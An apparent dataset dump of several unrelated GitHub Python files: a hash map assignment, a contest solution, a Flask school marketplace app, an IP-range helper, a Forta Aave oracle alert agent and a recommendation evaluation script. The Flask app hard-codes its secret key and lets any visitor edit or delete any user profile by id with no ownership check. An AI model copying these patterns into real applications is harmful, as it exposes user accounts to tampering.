not None:\n return True\n\n return False\n\n def empty_buckets(self) -> int:\n \"\"\"\n This method determines the number of empty buckets in the hash map.\n :return int: returns the number of empty buckets in the hash map\n \"\"\"\n empty = 0\n\n for index in range(self.capacity):\n if self.buckets.get_at_index(index).length() == 0:\n empty += 1\n\n return empty\n\n def table_load(self) -> float:\n \"\"\"\n This method returns the current hash table load factor\n (determines the overall hash map usage)\n :return float: overall hash map usage\n \"\"\"\n hash_use = 0\n\n for index in range(self.capacity):\n list = self.buckets.get_at_index(index)\n\n hash_use += list.length()\n\n return hash_use / self.capacity\n\n def resize_table(self, new_capacity: int) -> None:\n \"\"\"\n This method changes the capacity of the internal hash table.\n All existing key:value pairs remain in the new hash map\n and all hash table links are rehashed.\n If new_capacity is less than 1, the method does nothing.\n :param new_capacityint: new capacity of the internal hash table\n \"\"\"\n if new_capacity < 1:\n\n return\n\n new_hashmap = DynamicArray()\n\n # generate the new hash map\n for i in range(new_capacity):\n new_hashmap.append(LinkedList())\n\n for index in range(self.capacity):\n list = self.buckets.get_at_index(index) # get the singly linked list\n\n if list.length() == 0:\n continue\n\n for node in list:\n # generate new hash\n hash = self.hash_function(node.key)\n index = hash % new_capacity\n #insert in new hash map\n new_hashmap.get_at_index(index).insert(node.key, node.value)\n\n # replace old values with new\n self.buckets = new_hashmap\n self.capacity = new_capacity\n\n del new_hashmap\n\n return\n\n def get_keys(self) -> DynamicArray:\n \"\"\"\n This method returns a DynamicArray that contains all keys stored in your hash map.\n The order of the keys in the DA does not matter.\n :return DynamicArray: returns an array of keys in the hash map\n \"\"\"\n DA = DynamicArray()\n for index in range (self.capacity):\n list = self.buckets.get_at_index(index)\n\n if list.length() == 0:\n continue\n\n for node in list:\n DA.append(node.key)\n\n return DA\n\n\n# BASIC TESTING\nif __name__ == \"__main__\":\n\n print(\"\\nPDF - empty_buckets example 1\")\n print(\"-----------------------------\")\n m = HashMap(100, hash_function_1)\n print(m.empty_buckets(), m.size, m.capacity)\n m.put('key1', 10)\n print(m.empty_buckets(), m.size, m.capacity)\n m.put('key2', 20)\n print(m.empty_buckets(), m.size, m.capacity)\n m.put('key1', 30)\n print(m.empty_buckets(), m.size, m.capacity)\n m.put('key4', 40)\n print(m.empty_buckets(), m.size, m.capacity)\n\n\n print(\"\\nPDF - empty_buckets example 2\")\n print(\"-----------------------------\")\n m = HashMap(50, hash_function_1)\n for i in range(150):\n m.put('key' + str(i), i * 100)\n if i % 30 == 0:\n print(m.empty_buckets(), m.size, m.capacity)\n\n\n print(\"\\nPDF - table_load example 1\")\n print(\"--------------------------\")\n m = HashMap(100, hash_function_1)\n print(m.table_load())\n m.put('key1', 10)\n print(m.table_load())\n m.put('key2', 20)\n print(m.table_load())\n m.put('key1', 30)\n print(m.table_load())\n\n\n print(\"\\nPDF - table_load example 2\")\n print(\"--------------------------\")\n m = HashMap(50, hash_function_1)\n for i in range(50):\n m.put('key' + str(i), i * 100)\n if i % 10 == 0:\n print(m.table_load(), m.size, m.capacity)\n\n print(\"\\nPDF - clear example 1\")\n print(\"---------------------\")\n m = HashMap(100, hash_function_1)\n print(m.size, m.capacity)\n m.put('key1', 10)\n m.put('key2', 20)\n m.put('key1', 30)\n print(m.size, m.capacity)\n m.clear()\n print(m.size, m.capacity)\n\n\n print(\"\\nPDF - clear example 2\")\n print(\"---------------------\")\n m = HashMap(50, hash_function_1)\n print(m.size, m.capacity)\n m.put('key1', 10)\n print(m.size, m.capacity)\n m.put('key2', 20)\n print(m.size, m.capacity)\n m.resize_table(100)\n print(m.size, m.capacity)\n m.clear()\n print(m.size, m.capacity)\n\n\n print(\"\\nPDF - put example 1\")\n print(\"-------------------\")\n m = HashMap(50, hash_function_1)\n for i in range(150):\n m.put('str' + str(i), i * 100)\n if i % 25 == 24:\n print(m.empty_buckets(), m.table_load(), m.size, m.capacity)\n\n\n print(\"\\nPDF - put example 2\")\n print(\"-------------------\")\n m = HashMap(40, hash_function_2)\n for i in range(50):\n m.put('str' + str(i // 3), i * 100)\n if i % 10 == 9:\n print(m.empty_buckets(), m.table_load(), m.size, m.capacity)\n\n\n print(\"\\nPDF - contains_key example 1\")\n print(\"----------------------------\")\n m = HashMap(10, hash_function_1)\n print(m.contains_key('key1'))\n m.put('key1', 10)\n m.put('key2', 20)\n m.put('key3', 30)\n print(m.contains_key('key1'))\n print(m.contains_key('key4'))\n print(m.contains_key('key2'))\n print(m.contains_key('key3'))\n m.remove('key3')\n print(m.contains_key('key3'))\n\n\n print(\"\\nPDF - contains_key example 2\")\n print(\"----------------------------\")\n m = HashMap(75, hash_function_2)\n keys = [i for i in range(1, 1000, 20)]\n for key in keys:\n m.put(str(key), key * 42)\n print(m.size, m.capacity)\n result = True\n for key in keys:\n # all inserted keys must be present\n result &= m.contains_key(str(key))\n # NOT inserted keys must be absent\n result &= not m.contains_key(str(key + 1))\n print(result)\n\n\n print(\"\\nPDF - get example 1\")\n print(\"-------------------\")\n m = HashMap(30, hash_function_1)\n print(m.get('key'))\n m.put('key1', 10)\n print(m.get('key1'))\n\n\n print(\"\\nPDF - get example 2\")\n print(\"-------------------\")\n m = HashMap(150, hash_function_2)\n for i in range(200, 300, 7):\n m.put(str(i), i * 10)\n print(m.size, m.capacity)\n for i in range(200, 300, 21):\n print(i, m.get(str(i)), m.get(str(i)) == i * 10)\n print(i + 1, m.get(str(i + 1)), m.get(str(i + 1)) == (i + 1) * 10)\n\n\n print(\"\\nPDF - remove example 1\")\n print(\"----------------------\")\n m = HashMap(50, hash_function_1)\n print(m.get('key1'))\n m.put('key1', 10)\n print(m.get('key1'))\n m.remove('key1')\n print(m.get('key1'))\n m.remove('key4')\n\n\n print(\"\\nPDF - resize example 1\")\n print(\"----------------------\")\n m = HashMap(20, hash_function_1)\n m.put('key1', 10)\n print(m.size, m.capacity, m.get('key1'), m.contains_key('key1'))\n m.resize_table(30)\n print(m.size, m.capacity, m.get('key1'), m.contains_key('key1'))\n\n\n print(\"\\nPDF - resize example 2\")\n print(\"----------------------\")\n m = HashMap(75, hash_function_2)\n keys = [i for i in range(1, 1000, 13)]\n for key in keys:\n m.put(str(key), key * 42)\n print(m.size, m.capacity)\n\n for capacity in range(111, 1000, 117):\n m.resize_table(capacity)\n\n m.put('some key', 'some value')\n result = m.contains_key('some key')\n m.remove('some key')\n\n for key in keys:\n result &= m.contains_key(str(key))\n result &= not m.contains_key(str(key + 1))\n print(capacity, result, m.size, m.capacity, round(m.table_load(), 2))\n\n\n print(\"\\nPDF - get_keys example 1\")\n print(\"------------------------\")\n m = HashMap(10, hash_function_2)\n for i in range(100, 200, 10):\n m.put(str(i), str(i * 10))\n print(m.get_keys())\n\n m.resize_table(1)\n print(m.get_keys())\n\n m.put('200', '2000')\n m.remove('100')\n m.resize_table(2)\n print(m.get_keys())\n","repo_name":"jeffreykstone/CS261_assignment5_hash_map","sub_path":"hash_map.py","file_name":"hash_map.py","file_ext":"py","file_size_in_byte":12827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8690167295","text":"# cook your dish here\nt=int(input())\nfor _ in range(t):\n n=int(input())\n arr=list(map(int,input().lstrip().split()))\n arr.sort()\n count = 0\n rep=1\n for i in range(n-1):\n if arr[i]*arr[i+1]>arr[i]+arr[i+1]:\n count+=(n-(i+1))*rep\n rep=1\n if arr[i]==arr[i+1] and arr[i]==2:\n rep+=1\n print(count)","repo_name":"dhruv-gautam16/Code_Chef-Contest-","sub_path":"PROSUM.py","file_name":"PROSUM.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"3319566011","text":"import os\nimport sys\nimport requests\nfrom flask import Flask, render_template, redirect, make_response, request, session, abort\nfrom data import db_session\nfrom data.users import User\nfrom data.goods import Goods\nfrom forms.goods import GoodsForm\nfrom forms.users import RegisterForm, LoginForm, EditForm\nfrom flask_login import LoginManager, login_user, logout_user, login_required, current_user\nfrom werkzeug.utils import secure_filename\nfrom flask_socketio import SocketIO, send\n\napp = Flask(__name__)\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\napp.config['SECRET_KEY'] = 'yandexlyceum_secret_key'\nUPLOAD_PATH = 'static/images/'\n\n\ndef get_map_picture():\n map_request = \"https://static-maps.yandex.ru/1.x/?ll=37.596056,55.635236&z=15&l=map&pt=37.596056,55.635236,pm2rdm\"\n response = requests.get(map_request)\n if not response:\n print(\"Ошибка выполнения запроса:\")\n print(map_request)\n print(\"Http статус:\", response.status_code, \"(\", response.reason, \")\")\n sys.exit(1)\n map_file = \"static/img/map.png\"\n with open(map_file, \"wb\") as file:\n file.write(response.content)\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n db_sess = db_session.create_session()\n return db_sess.query(User).get(user_id)\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n db_sess = db_session.create_session()\n goods = db_sess.query(Goods)\n if current_user.is_authenticated:\n return render_template(\"index.html\", goods=goods)\n return render_template(\"hello.html\")\n\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n message = ''\n form = RegisterForm()\n db_sess = db_session.create_session()\n if form.validate_on_submit():\n if form.password.data != form.confirm_password.data:\n return render_template(\"register.html\", title='Регистрация', form=form, message='Пароли не совпадают')\n if db_sess.query(User).filter(User.email == form.email.data).first():\n return render_template(\"register.html\", title='Регистрация', form=form,\n message='Такой пользователь уже существует')\n if db_sess.query(User).filter(User.phone == form.phone.data).first():\n return render_template(\"register.html\", title='Регистрация', form=form,\n message='Такой пользователь уже существует')\n user = User(\n username=form.username.data,\n classnum=form.classnum.data,\n phone=form.phone.data,\n email=form.email.data\n )\n user.set_password(form.password.data)\n db_sess.add(user)\n db_sess.commit()\n return redirect('/login')\n return render_template(\"register.html\", title='Регистрация', form=form, message=message)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n form = LoginForm()\n db_sess = db_session.create_session()\n if form.validate_on_submit():\n user = db_sess.query(User).filter(User.email == form.email.data).first()\n if user and user.check_password(form.password.data):\n login_user(user, remember=form.remember_me.data)\n return redirect('/my_profile')\n return render_template(\"login.html\", form=form, title='Авторизация', message=\"Неправильный логин или пароль\")\n return render_template('login.html', form=form, title='Авторизация')\n\n\n@app.route('/my_profile')\n@login_required\ndef profile():\n db_sess = db_session.create_session()\n users = db_sess.query(User).filter(User.id == current_user.id).first()\n return render_template(\"my_profile.html\", title=\"Профиль\", users=users)\n\n\n@app.route('/users/<int:id>', methods=['GET', 'POST'])\n@login_required\ndef edit_profile(id):\n form = EditForm()\n if request.method == \"GET\":\n db_sess = db_session.create_session()\n users = db_sess.query(User).filter(User.id == id).first()\n if users:\n form.username.data = users.username\n form.classnum.data = users.classnum\n form.phone.data = users.phone\n form.email.data = users.email\n else:\n abort(404)\n if form.validate_on_submit():\n db_sess = db_session.create_session()\n users = db_sess.query(User).filter(User.id == id).first()\n if users:\n users.username = form.username.data\n users.classnum = form.classnum.data\n users.phone = form.phone.data\n users.email = form.email.data\n db_sess.commit()\n return redirect('/my_profile')\n else:\n abort(404)\n return render_template('edit_profile.html',\n title='Редактирование профиля',\n form=form)\n\n\n@app.route('/users_delete/<int:id>', methods=['GET', 'POST'])\ndef delete_profile(id):\n db_sess = db_session.create_session()\n users = db_sess.query(User).filter(User.id == id).first()\n if users:\n db_sess.delete(users)\n db_sess.commit()\n redirect('/logout')\n else:\n abort(404)\n return redirect('/')\n\n\n# @app.route('/profile/<int:id>')\n# @login_required\n# def seller_profile(id):\n# db_sess = db_session.create_session()\n# users = db_sess.query(User).filter(User.id == id).first()\n# return render_template('profile.html', title='Профиль продавцв', users=users)\n\n\n@app.route('/my_goods', methods=['GET', 'POST'])\n@login_required\ndef my_goods():\n db_sess = db_session.create_session()\n goods = db_sess.query(Goods).filter(Goods.user_id == current_user.id)\n if goods:\n return render_template(\"my_goods.html\", goods=goods, title=\"Мои объявления\")\n return redirect(\"/\")\n\n\n@app.route('/all_goods', methods=['GET', 'POST'])\n@login_required\ndef all_goods():\n db_sess = db_session.create_session()\n goods = db_sess.query(Goods)\n if goods:\n return render_template(\"all_goods.html\", goods=goods, title=\"Все объявления\")\n return redirect(\"/my_profile\")\n\n\n@app.route('/add_goods', methods=['GET', 'POST'])\n@login_required\ndef add_goods():\n form = GoodsForm()\n if form.validate_on_submit():\n filename = secure_filename(form.file.data.filename)\n db_sess = db_session.create_session()\n goods = Goods()\n goods.title = form.title.data\n goods.description = form.description.data\n goods.price = form.price.data\n goods.picture = f\"img/{filename}\"\n current_user.goods.append(goods)\n db_sess.merge(current_user)\n db_sess.commit()\n return redirect('/my_goods')\n return render_template('add_goods.html', title='Добавление товара',\n form=form)\n\n\n@app.route('/goods/<int:id>', methods=['GET', 'POST'])\n@login_required\ndef edit_goods(id):\n form = GoodsForm()\n if request.method == \"GET\":\n db_sess = db_session.create_session()\n goods = db_sess.query(Goods).filter(Goods.id == id, Goods.user == current_user).first()\n if goods:\n form.title.data = goods.title\n form.description.data = goods.description\n form.price.data = goods.price\n else:\n abort(404)\n if form.validate_on_submit():\n db_sess = db_session.create_session()\n goods = db_sess.query(Goods).filter(Goods.id == id, Goods.user == current_user).first()\n if goods:\n filename = secure_filename(form.file.data.filename)\n goods.title = form.title.data\n goods.description = form.description.data\n goods.price = form.price.data\n goods.picture = f\"img/{filename}\"\n db_sess.commit()\n return redirect('/my_goods')\n else:\n abort(404)\n return render_template('edit_goods.html',\n title='Редактирование товара',\n form=form)\n\n\n@app.route('/goods_delete/<int:id>', methods=['GET', 'POST'])\n@login_required\ndef goods_delete(id):\n db_sess = db_session.create_session()\n goods = db_sess.query(Goods).filter(Goods.id == id, Goods.user == current_user).first()\n if goods:\n db_sess.delete(goods)\n db_sess.commit()\n else:\n abort(404)\n return redirect('/my_goods')\n\n\n@app.route('/goods_info/<int:id>', methods=['GET', 'POST'])\ndef goods_info(id):\n db_sess = db_session.create_session()\n goods = db_sess.query(Goods).filter(Goods.id == id).first()\n return render_template('good.html',\n goods=goods,\n title='Товар')\n\n\n@app.route('/profile/<int:id>', methods=['GET', 'POST'])\ndef profile_info(id):\n db_sess = db_session.create_session()\n users = db_sess.query(User).filter(User.id == id).first()\n return render_template('profile.html', users=users, title='Профиль продавца')\n\n\n@app.route('/logout')\ndef logout():\n logout_user()\n return redirect('/')\n\n\n@app.route('/about')\ndef about():\n return render_template('about.html', title='Подробнее')\n\n\ndef main():\n db_session.global_init('db/SchoolSwap.sqlite')\n app.run(port=8080, host='127.0.0.1')\n\n\nif __name__ == '__main__':\n get_map_picture()\n main()\n os.remove('static/img/map.png')\n","repo_name":"WhoReadThisWillDie/SchoolSwap","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23790035751","text":"import ipaddress\nimport re\nfrom pathlib import Path\nfrom threading import Thread\nfrom typing import List, Generator, Callable\n\n\nclass CdnProxyException(Exception):\n pass\n\n\ndef trim(s: str, length: int):\n if len(s) <= length:\n return s\n else:\n return s[0:length] + \"...\"\n\n\ndef targets_to_hosts(networks: List[str]) -> Generator[str, None, None]:\n for net in networks:\n p = Path(net)\n if p.is_file():\n for m in re.finditer(r'([0-9]{1,3}\\.){3}[0-9]{1,3}(?:/\\d\\d?)?', p.read_text()):\n for host in ipaddress.ip_network(m.group(0)).hosts():\n yield str(host)\n else:\n for host in ipaddress.ip_network(net).hosts():\n yield str(host)","repo_name":"RyanJarv/cdn-proxy","sub_path":"cdn_proxy/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":215,"dataset":"github-code","pt":"48"} +{"seq_id":"22380467607","text":"from forta_agent import Finding, FindingType, FindingSeverity\nfrom .constants import AAVE_PRICE_ORACLE_ADDRESS, SET_FALLBACK_ORACLE_FUNCTION_ABI\n\n\ndef handle_transaction(transaction_event):\n findings = []\n set_fallback_oracle_invocations = transaction_event.filter_function(SET_FALLBACK_ORACLE_FUNCTION_ABI, AAVE_PRICE_ORACLE_ADDRESS)\n print(transaction_event)\n\n for invocation in set_fallback_oracle_invocations:\n args = invocation[1]\n findings.append(Finding({\n 'name': 'Aave Set Fallback Oracle Function Agent',\n 'description': f'AavepriceOracle.setFallbackOracle() function is called. Fallback oracle value: {args[\"fallbackOracle\"]}',\n 'alert_id': 'AAVE-1',\n 'type': FindingType.Suspicious,\n 'severity': FindingSeverity.Critical,\n 'metadata': {\n 'fallback_oracle': args['fallbackOracle'],\n 'tx_hash': transaction_event.hash\n }\n }))\n return findings\n\n","repo_name":"ssozuer/aave-fallback-oracle-function-agent","sub_path":"src/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19251042587","text":"from mars_gym.evaluation.policy_estimator import PolicyEstimatorTraining\nfrom mars_gym.torch.data import FasterBatchSampler, NoAutoCollationDataLoader\nfrom mars_gym.utils.reflection import load_attr, get_attribute_names\nfrom mars_gym.utils.utils import parallel_literal_eval, JsonEncoder\nfrom mars_gym.utils.index_mapping import (\n create_index_mapping,\n create_index_mapping_from_arrays,\n transform_with_indexing,\n map_array,\n)\nimport functools\nfrom multiprocessing.pool import Pool\nfrom mars_gym.evaluation.task import BaseEvaluationTask\nimport abc\nfrom typing import Type, Dict, List, Optional, Tuple, Union, Any, cast\nfrom torch.utils.data import DataLoader\nfrom mars_gym.torch.data import NoAutoCollationDataLoader, FasterBatchSampler\nfrom torchbearer import Trial\nfrom data import SessionInteractionDataFrame\nimport gc\nimport luigi\nimport pandas as pd\nimport numpy as np\nimport os\nimport pickle\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom mars_gym.cuda import CudaRepository\nimport torchbearer\nfrom tqdm import tqdm\nfrom mars_gym.data.dataset import (\n preprocess_interactions_data_frame,\n InteractionsDataset,\n)\nfrom mars_gym.utils.index_mapping import (\n transform_with_indexing,\n)\nfrom mars_gym.data.dataset import (\n preprocess_interactions_data_frame,\n InteractionsDataset,\n)\nfrom mars_gym.evaluation.metrics.rank import (\n mean_reciprocal_rank,\n average_precision,\n precision_at_k,\n ndcg_at_k,\n personalization_at_k,\n prediction_coverage_at_k,\n)\nfrom mars_gym.utils.utils import parallel_literal_eval, JsonEncoder\nimport pprint\nimport json\nimport luigi\nimport pandas as pd\nimport functools\nimport numpy as np\nfrom tqdm import tqdm\nimport os\nfrom multiprocessing.pool import Pool\nfrom scipy import stats\n#from train import MostPopularTraining, CoOccurrenceTraining\nfrom sklearn.metrics import classification_report\nfrom train import CoOccurrenceTraining\nimport pickle \n\nSCORE_LIMIT = 200\n\ndef acc(r, k =4):\n r = r[:k]\n return np.sum(r)\n\ndef _sort_rank_list(scores, cities_list, neighbors_idx, index_mapping):\n # UNK, PAD, PAD, Cities in List\n #from IPython import embed; embed()\n scores[0] = scores[1] = scores[2] = scores[3] = 0\n #scores[cities_list] = 0\n\n item_idx = np.argsort(scores)[::-1][:SCORE_LIMIT]\n \n if neighbors_idx and len(np.unique(neighbors_idx)) > 0:\n neighbors_idx = np.unique(neighbors_idx)\n \n # Not Neighbors\n n_idx = list(set(np.arange(len(scores))) - set(neighbors_idx))\n scores[n_idx] = 0\n\n item_idx = np.argsort(scores)[::-1][:SCORE_LIMIT]\n item_id = [int(index_mapping[item]) for item in item_idx if item in neighbors_idx and index_mapping[item] != \"M\"]\n else:\n item_id = [int(index_mapping[item]) for item in item_idx if index_mapping[item] != \"M\"]\n #\n return item_id\n\ndef _get_moda(arr):\n try:\n return stats.mode(arr)[0][0]\n except:\n return 0 \n\ndef _get_count_moda(arr):\n try:\n return stats.mode(arr)[1][0]/len(arr)\n except:\n return 0 \n\ndef _create_relevance_list(sorted_actions, expected_action):\n return [1 if str(action) == str(expected_action) else 0 for action in sorted_actions]\n\n\n# PYTHONPATH=\".\" luigi --module mercado_livre.evaluation MLEvaluationTask \\\n# --model-task-class \"mars_gym.simulation.training.SupervisedModelTraining\" \\\n# --model-task-id SupervisedModelTraining____mars_gym_model_b____e3ae64b091 \\\n# --normalize-file-path \"226cbf7ae2_std_scaler.pkl\" \\\n# --history-window 20 \\\n# --batch-size 1000 \\\n# --local-scheduler \\\n# --file \"/media/workspace/triplet_session/output/mercado_livre/dataset/test_0.10_test=random_42_SessionInteractionDataFrame_____SessionID_226cbf7ae2.csv\"\n\nclass EvaluationTask(BaseEvaluationTask):\n model_task_class: str = luigi.Parameter(\n default=\"mars_gym.simulation.training.SupervisedModelTraining\"\n )\n model_task_id: str = luigi.Parameter()\n offpolicy_eval: bool = luigi.BoolParameter(default=False)\n task_hash: str = luigi.Parameter(default=\"sub\")\n generator_workers: int = luigi.IntParameter(default=0)\n pin_memory: bool = luigi.BoolParameter(default=False)\n batch_size: int = luigi.IntParameter(default=1000)\n device: str = luigi.ChoiceParameter(choices=[\"cpu\", \"cuda\"], default=\"cuda\")\n normalize_dense_features: int = luigi.Parameter(default=\"min_max\")\n normalize_file_path: str = luigi.Parameter(default=None)\n file: str = luigi.Parameter(default=\"\")\n neighbors_file: str = luigi.Parameter(default=None)\n model_eval: str = luigi.ChoiceParameter(choices=[\"model\", \"most_popular\", \"coocorrence\"], default=\"model\")\n submission_size: int = luigi.IntParameter(default=4)\n\n @property\n def task_name(self):\n return self.model_task_id + \"_\" + self.task_id.split(\"_\")[-1]\n\n # def requires(self):\n # if self.local:\n # return SessionInteractionDataFrame(history_window=self.history_window)\n # else:\n # return SplitTrainTestDataset(sample_days=self.history_window)\n # sample_days: int = luigi.IntParameter(default=30)\n # test_days: int = luigi.IntParameter(default=7)\n # window_trip: int = luigi.IntParameter(default=5)\n\n @property\n def torch_device(self) -> torch.device:\n if not hasattr(self, \"_torch_device\"):\n if self.device == \"cuda\":\n self._torch_device = torch.device(f\"cuda:{self.device_id}\")\n else:\n self._torch_device = torch.device(\"cpu\")\n return self._torch_device\n\n @property\n def device_id(self):\n if not hasattr(self, \"_device_id\"):\n if self.device == \"cuda\":\n self._device_id = CudaRepository.get_avaliable_device()\n else:\n self._device_id = None\n return self._device_id\n\n def get_test_generator(self, df) -> Optional[DataLoader]:\n\n dataset = InteractionsDataset(\n data_frame=df,\n embeddings_for_metadata=self.model_training.embeddings_for_metadata,\n project_config=self.model_training.project_config,\n index_mapping=self.model_training.index_mapping\n )\n\n batch_sampler = FasterBatchSampler(\n dataset, self.batch_size, shuffle=False\n )\n\n return NoAutoCollationDataLoader(\n dataset,\n batch_sampler=batch_sampler,\n num_workers=self.generator_workers,\n pin_memory=self.pin_memory if self.device == \"cuda\" else False,\n )\n\n def run(self):\n os.makedirs(self.output().path)\n \n df: pd.DataFrame = pd.read_csv(self.file)\n df = df[df['trip_size'] > 0] # TODO Remove\n\n target = 'last_city_id'\n print(df.head())\n if target in df.columns:\n df_metric = df[['utrip_id', 'city_id_list', 'last_city_id', 'last_hotel_country']]\n\n df = preprocess_interactions_data_frame(\n df, \n self.model_training.project_config\n )\n\n data = SessionInteractionDataFrame()\n # item_column=\"\",\n # normalize_dense_features=self.normalize_dense_features,\n # normalize_file_path=self.normalize_file_path\n\n df = data.transform_data_frame(df, \"TEST_GENERATOR\")\n\n df.to_csv(self.output().path+\"/dataset.csv\")\n\n transform_with_indexing(\n df, \n self.model_training.index_mapping, \n self.model_training.project_config\n )\n # \n df.to_csv(self.output().path+\"/dataset_indexed.csv\")\n generator = self.get_test_generator(df)\n\n print(df.head())\n print(df.shape)\n\n \n index_mapping = self.model_training.index_mapping['last_city_id']\n reverse_index_mapping = self.model_training.reverse_index_mapping['last_city_id']\n reverse_index_mapping[1] = 0\n #from IPython import embed; embed()\n # Map Neighbors\n neighbors_file = None\n neighbors_dict = None\n if self.neighbors_file:\n print(\"load neighbors...\")\n with open(self.neighbors_file, \"rb\") as pkl_handle:\n neighbors_file = pickle.load(pkl_handle)\n neighbors_dict = {}\n for key, values in neighbors_file.items():\n neighbors_dict[index_mapping[key]] = [index_mapping[k] for k in values]\n neighbors_dict[0] = []\n neighbors_dict[1] = []\n neighbors_dict[2] = []\n neighbors_dict[3] = []\n \n\n if self.model_eval == \"model\":\n rank_list = self.model_rank_list(generator, reverse_index_mapping, neighbors_dict)\n # elif self.model_eval == \"most_popular\":\n # rank_list = self.most_popular_rank_list(generator, reverse_index_mapping)\n elif self.model_eval == \"coocorrence\":\n rank_list = self.coocorrence_rank_list(generator, reverse_index_mapping, neighbors_dict)\n\n # Save metrics\n if target in df.columns:\n self.save_metrics(df_metric, rank_list)\n\n self.save_submission(df_metric, rank_list)\n\n def save_submission(self, df_metric, rank_list):\n\n df_metric['reclist'] = list(rank_list)\n df_metric['city_id_1'] = df_metric['reclist'].apply(lambda reclist: reclist[0])\n df_metric['city_id_2'] = df_metric['reclist'].apply(lambda reclist: reclist[1])\n df_metric['city_id_3'] = df_metric['reclist'].apply(lambda reclist: reclist[2])\n df_metric['city_id_4'] = df_metric['reclist'].apply(lambda reclist: reclist[3])\n\n # base submission\n df_metric[['utrip_id', 'city_id_1', 'city_id_2', 'city_id_3', 'city_id_4']]\\\n .to_csv(self.output().path+'/submission_{}.csv'.format(self.task_name), index=False)\n\n # Save submission\n #np.savetxt(self.output().path+'/submission_{}.csv'.format(self.task_name), rank_list, fmt='%i', delimiter=',') \n df_metric[['utrip_id', 'reclist']]\\\n .to_csv(self.output().path+'/all_reclist_{}.csv'.format(self.task_name), index=False)\n\n def save_metrics(self, df_metric, rank_list):\n #from IPython import embed; embed()\n df_metric['reclist'] = list(rank_list)\n df_metric['predict'] = df_metric['reclist'].apply(lambda l: l[0] if len(l) > 0 else 0)\n #from IPython import embed; embed()\n df_metric['acc@4'] = df_metric.apply(lambda row: row['last_city_id'] in row.reclist[:4], axis=1).astype(int)\n \n metric = {\n 'task_name': self.task_name,\n 'count': len(df_metric),\n 'acc@4': df_metric['acc@4'].mean()\n }\n\n # Save Metrics\n with open(os.path.join(self.output().path, \"metric.json\"), \"w\") as params_file:\n json.dump(metric, params_file, default=lambda o: dict(o), indent=4)\n \n df_metric.to_csv(self.output().path+'/metric.csv', index=False)\n\n pd.DataFrame(\n classification_report(df_metric['last_city_id'], df_metric['predict'], output_dict=True)\n ).transpose().sort_values('support', ascending=False ) \\\n .to_csv(self.output().path+'/classification_report.csv')\n\n # Print\n print(json.dumps(metric, indent=4))\n\n def model_rank_list(self, generator, reverse_index_mapping, neighbors_dict):\n\n # Gente Model\n model = self.model_training.get_trained_module()\n model.to(self.torch_device)\n model.eval()\n\n scores = []\n rank_list = []\n idx_item_id = 2\n\n def get_neighbors(n, neighbors_dict):\n neighbors = [neighbors_dict[i] for i in n if i in neighbors_dict]\n neighbors = list(np.unique(sum(neighbors, [])))\n return neighbors\n\n # Inference\n with torch.no_grad():\n for i, (x, _) in tqdm(enumerate(generator), total=len(generator)):\n input_params = x if isinstance(x, list) or isinstance(x, tuple) else [x]\n input_params = [t.to(self.torch_device) if isinstance(t, torch.Tensor) else t for t in input_params]\n\n scores_tensor: torch.Tensor = model.recommendation_score(*input_params)\n scores_batch = scores_tensor.detach().cpu().numpy()\n\n cities_list = x[2].detach().cpu().numpy()\n #neighbors_dict\n #from IPython import embed; embed()\n \n # Neighbors\n if neighbors_dict:\n # last_item_idx = x[idx_item_id].numpy()[:,-1]\n # neighbors_idx = []\n # for i in last_item_idx:\n # if i in neighbors_dict:\n # neighbors_idx.append(neighbors_dict[i])\n # else:\n # neighbors_idx.append(list(neighbors_dict.keys()))\n \n neighbors_idx = [get_neighbors(n, neighbors_dict) for n in x[idx_item_id].numpy()]\n #from IPython import embed; embed()\n else:\n #scores.extend(scores_batch)\n neighbors_idx = [None for i in range(len(scores_batch))]\n # Test\n _sort_rank_list(scores_batch[0], neighbors_idx=neighbors_idx[0], cities_list=cities_list[0], index_mapping=reverse_index_mapping)\n \n #from IPython import embed; embed()\n with Pool(3) as p:\n _rank_list = list(tqdm(\n p.starmap(functools.partial(_sort_rank_list, index_mapping=reverse_index_mapping), zip(scores_batch, cities_list, neighbors_idx)),\n total=len(scores_batch),\n ))\n \n rank_list.extend(_rank_list)\n #from IPython import embed; embed()\n gc.collect()\n #from IPython import embed; embed()\n return rank_list\n\n def coocorrence_rank_list(self, generator, reverse_index_mapping, neighbors_file):\n \n\n cooccurrence = CoOccurrenceTraining(project=\"config.base_rnn\",\n data_frames_preparation_extra_params=self.model_training.data_frames_preparation_extra_params,\n test_size=self.model_training.test_size,\n val_size=self.model_training.val_size,\n test_split_type=self.model_training.test_split_type,\n dataset_split_method=self.model_training.dataset_split_method) #\n cooccurrence.fit(self.model_training.train_data_frame)\n\n scores = []\n rank_list = []\n\n # Inference\n for i, (x, _) in tqdm(enumerate(generator), total=len(generator)):\n input_params = x if isinstance(x, list) or isinstance(x, tuple) else [x]\n\n scores_batch = [] # nxk\n item_idx = list(range(self.model_training.n_items))\n for item_history in input_params[2]:\n last_item_idx = item_history.detach().cpu().numpy()[0]\n\n score = [cooccurrence.get_score(last_item_idx, i) for i in item_idx]\n \n\n scores_batch.append(score)\n\n # Test\n _sort_rank_list(scores_batch[0], index_mapping=reverse_index_mapping)\n\n with Pool(3) as p:\n _rank_list = list(tqdm(\n p.map(functools.partial(_sort_rank_list, index_mapping=reverse_index_mapping), scores_batch),\n total=len(scores_batch),\n ))\n rank_list.extend(_rank_list)\n\n gc.collect()\n \n return rank_list","repo_name":"marlesson/booking_challenge","sub_path":"evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":15761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} 